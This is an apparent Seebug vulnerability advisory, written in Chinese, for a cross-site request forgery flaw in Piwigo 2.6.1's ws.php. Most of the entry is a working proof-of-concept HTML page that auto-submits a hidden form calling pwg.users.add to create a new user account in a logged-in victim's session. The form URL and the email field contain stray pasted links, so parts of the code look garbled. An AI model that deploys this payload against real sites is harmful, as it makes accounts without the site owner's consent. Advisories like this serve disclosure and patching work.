Piwigo 'ws.php'跨站请求伪造漏洞

2014-02-28T00:00:00
ID SSV:61601
Type seebug
Reporter Root
Modified 2014-02-28T00:00:00

Description

Bugtraq ID:65811

Piwigo是一个基于MySQL5与PHP5开发的相册系统。

Piwigo存在一个跨站请求伪造漏洞,允许远程攻击者构建恶意URI,诱使用户解析,可以目标用户上下文执行恶意操作。 0 Piwigo 2.6.1 目前没有详细解决方案提供: http://it.piwigo.org/

                                        
                                            
                                                <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
<html lang="en">
<head>
<title>Piwigo 2.6.1</title>
</head>
<body>
<form action="http://localhost/piwigo/ws.php?format=json&method=pwg.users.add http://localhost/piwigo/ws.php?format=json&method=pwg.users.add&lang=en " id="formid" method="post">
<input name="username" value="utente" />
<input name="password" value="utente" />
<input name="email" value="utente@gmail.com http://service.mail.com/callgate-6.73.1.0/rms/6.73.1.0/mail/getBody?folderId=1&messageId=OTg2SQZUNUQ2Occvtn5u651INxBSYcL4&purpose=display&bodyType=html# "/>
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>